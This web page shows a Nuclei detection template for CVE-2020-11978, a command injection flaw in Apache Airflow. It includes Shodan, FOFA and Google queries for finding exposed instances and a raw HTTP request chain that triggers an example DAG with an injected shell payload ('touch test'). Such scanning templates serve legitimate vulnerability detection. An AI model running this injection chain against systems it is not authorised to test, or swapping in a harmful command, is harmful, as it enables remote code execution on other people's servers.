Apache Airflow <=1.10.10 - Remote Code Execution
ID: CVE-2020-11978
Severity: high
Author: pdteam
Tags: cve2020,cve,packetstorm,apache,airflow,rce,kev
Description
Section titled “Description”Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
YAML Source
Section titled “YAML Source”id: CVE-2020-11978
info: name: Apache Airflow <=1.10.10 - Remote Code Execution author: pdteam severity: high description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - https://github.com/pberba/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-78 epss-score: 0.97444 epss-percentile: 0.99947 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: apache product: airflow shodan-query: - title:"Airflow - DAGs" || http.html:"Apache Airflow" - http.title:"airflow - dags" || http.html:"apache airflow" - http.title:"sign in - airflow" - product:"redis" fofa-query: - title="sign in - airflow" - apache airflow - title="airflow - dags" || http.html:"apache airflow" google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2020,cve,packetstorm,apache,airflow,rce,kev
http: - raw: - | GET /api/experimental/test HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/json
{"conf": {"message": "\"; touch test #"}} - | GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 Host: {{Hostname}} Accept: */*
matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_4, "operator":"BashOperator")' - 'contains(header_4, "application/json")' condition: and
extractors: - type: regex name: exec_date group: 1 regex: - '"execution_date":"([0-9-A-Z:+]+)"' internal: true part: body# digest: 490a00463044022039c0f74fdeaf2dcd60bdc70df13a3335c8b1518605105f9388d80a6ffa8650fe02200d4c6ad8430d3525421eb9c83f089d5bf987375111e3c2226562d00d5cf2dbfc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11978.yaml"